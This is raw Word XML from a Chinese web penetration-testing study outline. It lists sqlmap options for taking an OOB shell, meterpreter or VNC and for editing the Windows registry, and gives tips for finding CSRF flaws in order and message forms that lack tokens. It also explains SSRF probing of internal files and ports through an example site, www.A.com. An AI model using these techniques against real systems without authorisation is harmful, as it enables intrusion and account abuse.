    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–os-pwn </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>获取一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>OOB shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>VNC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–os-smbrelay </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>一键获取一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>OOB shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>VNC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–os-bof </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>存储过程缓冲区溢出利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–priv-esc </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>数据库进程用户权限提升</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:lastRenderedPageBreak/>
        <w:t>–msf-path=MSFPATH Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>本地的安装路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–tmp-path=TMPPATH </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>远程临时文件目录的绝对路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00CE7C42">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注册表访问：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>这些选项可以被用来访问后端数据库管理系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>注册表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–reg-read </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>读一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注册表项值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–reg-add </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>写一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注册表项值数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t xml:space="preserve">–reg-del </w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注册表键值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>–reg-key=REGKEY Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注册表键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>–reg-value=REGVAL Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注册表项值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>–reg-data=REGDATA Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注册表键值数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514A7F" w:rsidRPr="00514A7F" w:rsidRDefault="00514A7F" w:rsidP="00514A7F">
      <w:r w:rsidRPr="00514A7F">
        <w:t>–reg-type=REGTYPE Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00514A7F">
        <w:t>注册表项值类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E30013" w:rsidRDefault="004459A4" w:rsidP="00E30013">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C97E3D" w:rsidRDefault="00657A74" w:rsidP="008E3BCF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3875E37F" wp14:editId="55BC8C77">
            <wp:extent cx="5274310" cy="3327400"/>
            <wp:effectExtent l="152400" t="152400" r="364490" b="3683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A74" w:rsidRPr="00C97E3D" w:rsidRDefault="00657A74" w:rsidP="008E3BCF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="050F33EB" wp14:editId="35C4CD14">
            <wp:extent cx="5274310" cy="3327400"/>
            <wp:effectExtent l="152400" t="152400" r="364490" b="3683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2AE1FA" wp14:editId="0BA5F409">
            <wp:extent cx="5274310" cy="2856865"/>
            <wp:effectExtent l="152400" t="152400" r="364490" b="3625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D62" w:rsidRPr="008F2D62" w:rsidRDefault="008F2D62" w:rsidP="008F2D62">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc489789702"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪静态注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="006D0F4F" w:rsidRDefault="00382EF9" w:rsidP="006D0F4F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_XSS漏洞"/>
      <w:bookmarkStart w:id="18" w:name="_Toc489789703"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00605F9F" w:rsidRDefault="00605F9F" w:rsidP="00605F9F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习这个漏洞，要学习一下网页开发知识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B27979" w:rsidRDefault="00B27979" w:rsidP="00B27979">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc489789704"/>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tml</w:t>
      </w:r>
      <w:r w:rsidR="00897604">
        <w:t xml:space="preserve"> + Css</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00B27979" w:rsidRPr="00B27979" w:rsidRDefault="00B27979" w:rsidP="00B27979">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc489789705"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00E037AB" w:rsidRDefault="00E037AB" w:rsidP="00E037AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc489789706"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反射型</w:t>
      </w:r>
      <w:r w:rsidR="00CE7D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="001207C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00E037AB" w:rsidRDefault="00E037AB" w:rsidP="00E037AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc489789707"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储型</w:t>
      </w:r>
      <w:r w:rsidR="00CE7D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="001207C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="008C523D" w:rsidRDefault="008C523D" w:rsidP="008C523D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc489789708"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XS</w:t>
      </w:r>
      <w:r w:rsidR="006B6995">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>平台使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="008C523D" w:rsidRPr="008C523D" w:rsidRDefault="008C523D" w:rsidP="008C523D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc489789709"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kali beef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用（这个牛肉厉害</w:t>
      </w:r>
      <w:r w:rsidR="00737970">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00720558" w:rsidRPr="009E78EF" w:rsidRDefault="002D3999" w:rsidP="00720558">
      <w:pP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有可能学习</w:t>
      </w:r>
      <w:r w:rsidR="0044592B"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公网</w:t>
      </w:r>
      <w:r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beef,不只是再内网，所以有可能教搭建在服务器上面搭建beef</w:t>
      </w:r>
      <w:r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lastRenderedPageBreak/>
        <w:t>环境，beef这个就</w:t>
      </w:r>
      <w:r w:rsidR="00923BA5"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比较</w:t>
      </w:r>
      <w:r w:rsidRPr="009E78EF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厉害了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00565720" w:rsidRDefault="00565720" w:rsidP="00565720">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc489789710"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="000F7C75" w:rsidRDefault="000F7C75" w:rsidP="000F7C75">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc489789711"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些工具使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00F544E9" w:rsidRDefault="00F544E9" w:rsidP="00F544E9"/>
    <w:p w:rsidR="00F544E9" w:rsidRPr="00F544E9" w:rsidRDefault="00F544E9" w:rsidP="000A30BD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分水岭，上面都是基础中的基础</w:t>
      </w:r>
      <w:r w:rsidR="00D20373">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>！！！！！！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0135" w:rsidRPr="00AF0135" w:rsidRDefault="00AF0135" w:rsidP="00AF01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A6017" wp14:editId="63A5436C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>56407</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>176415</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5462649" cy="0"/>
                <wp:effectExtent l="38100" t="95250" r="62230" b="381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49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EDE05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3.9pt" to="43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" strokecolor="black [3200]" strokeweight="1.5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:rsidR="002F02A3" w:rsidRDefault="009F7105" w:rsidP="002F02A3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_CSRF漏洞"/>
      <w:bookmarkStart w:id="28" w:name="_Toc489789712"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="009C7BFE" w:rsidRPr="009C7BFE" w:rsidRDefault="009C7BFE" w:rsidP="009C7BFE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc489789713"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包验证漏洞是否存在</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00EE0D0C" w:rsidRDefault="00EE0D0C" w:rsidP="00EE0D0C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc489789714"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:t>(s)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF Token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00EE0D0C" w:rsidRDefault="00EE0D0C" w:rsidP="00EE0D0C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc489789715"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00EE0D0C" w:rsidRDefault="00EE0D0C" w:rsidP="00EE0D0C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE0D0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>弹幕评论无</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0D0C">
        <w:t>token直接发送</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0D0C" w:rsidRDefault="00EE0D0C" w:rsidP="00EE0D0C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE0D0C">
        <w:t>短信验证CSRF 输入手机号码然后抓包验证,发现没有token那么就直接构造然后替换手机号码如果成功就是CSRF漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0D0C" w:rsidRPr="00EE0D0C" w:rsidRDefault="00EE0D0C" w:rsidP="00EE0D0C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE0D0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布消息</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0D0C">
        <w:t xml:space="preserve"> 发布一个帖子处抓包无token,那么就很可能存在CSRF 触发率还是蛮高的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0D0C" w:rsidRPr="00EE0D0C" w:rsidRDefault="00EE0D0C" w:rsidP="00EE0D0C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE0D0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除订单</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0D0C">
        <w:t xml:space="preserve"> CSRF orderid=   替换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0D0C" w:rsidRDefault="00EE0D0C" w:rsidP="00EE0D0C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下订单处</w:t>
      </w:r>
      <w:r>
        <w:t>CSRF 购买东西,抓包提交订单很有可能没有token然后就可以直接构造</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0D0C" w:rsidRDefault="00EE0D0C" w:rsidP="00EE0D0C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在漏洞挖掘的时候假如无</w:t>
      </w:r>
      <w:r>
        <w:t>token但是有Sign的话，Sign就相当于token啊!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE0D0C" w:rsidRPr="00EE0D0C" w:rsidRDefault="00EE0D0C" w:rsidP="00490AE6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="1620"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>一般提交订单他开头部分就是</w:t>
      </w:r>
      <w:r>
        <w:t>_tb_token=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F15F5" w:rsidRDefault="006F15F5" w:rsidP="006F15F5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_SSRF漏洞"/>
      <w:bookmarkStart w:id="33" w:name="_Toc489789716"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidR="00C1332E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="005620AD" w:rsidRDefault="005620AD" w:rsidP="0081257C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SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）</w:t>
      </w:r>
      <w:r w:rsidR="003B2733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。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D24B9" w:rsidRDefault="003D24B9" w:rsidP="009111AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc489789717"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00CD1480" w:rsidRDefault="003D24B9" w:rsidP="0081257C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ab/>
        <w:t xml:space="preserve"> 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我们访问</w:t>
      </w:r>
      <w:r w:rsidR="00CD1480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如下网站：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D24B9" w:rsidRDefault="0073089F" w:rsidP="0081257C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hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00CD1480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www.A.com/A.php?</w:t>
        </w:r>
        <w:r w:rsidR="00CD1480" w:rsidRPr="00CE2254">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>image</w:t>
        </w:r>
        <w:r w:rsidR="00CD1480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=</w:t>
        </w:r>
        <w:r w:rsidR="00CD1480" w:rsidRPr="00CE2254">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.A.com/Image/A.png</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003B3A99" w:rsidRDefault="00CD1480" w:rsidP="003B3A99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CD1480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A网站上的图片地址是存储在</w:t>
      </w:r>
      <w:r w:rsidR="00004FA5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A网站/Image/A.png这个目录中，那么我们</w:t>
      </w:r>
      <w:r w:rsidR="003B3A99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尝试访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="003B3A99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www.A.com/A.php?</w:t>
        </w:r>
        <w:r w:rsidR="003B3A99" w:rsidRPr="00CE2254">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>image</w:t>
        </w:r>
        <w:r w:rsidR="003B3A99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=</w:t>
        </w:r>
        <w:r w:rsidR="003B3A99" w:rsidRPr="00CE2254">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.A.com/Image/A1.png，如果返回正确的图片，那么说明</w:t>
        </w:r>
        <w:r w:rsidR="003B3A99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/Image/下面有A1.png</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003B3A99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这个图片，以此类推我们就可以进行对A网站下Image/目录进行爆破探测是否有相应文件，当然也可以探测其他，例如端口探测</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="003B3A99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www.A.com/A.php?</w:t>
        </w:r>
        <w:r w:rsidR="003B3A99" w:rsidRPr="00CE2254">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>image</w:t>
        </w:r>
        <w:r w:rsidR="003B3A99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=</w:t>
        </w:r>
        <w:r w:rsidR="003B3A99" w:rsidRPr="00CE2254">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.A.com:8888/Image/A.png例如我们输入</w:t>
        </w:r>
        <w:r w:rsidR="003B3A99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8888</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003B3A99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端口如果返回正确数据那么说明，8888端口是开放的，反之没有开放，这就是利用SSRF对内网的探测。</w:t>
      </w:r>
    </w:p>
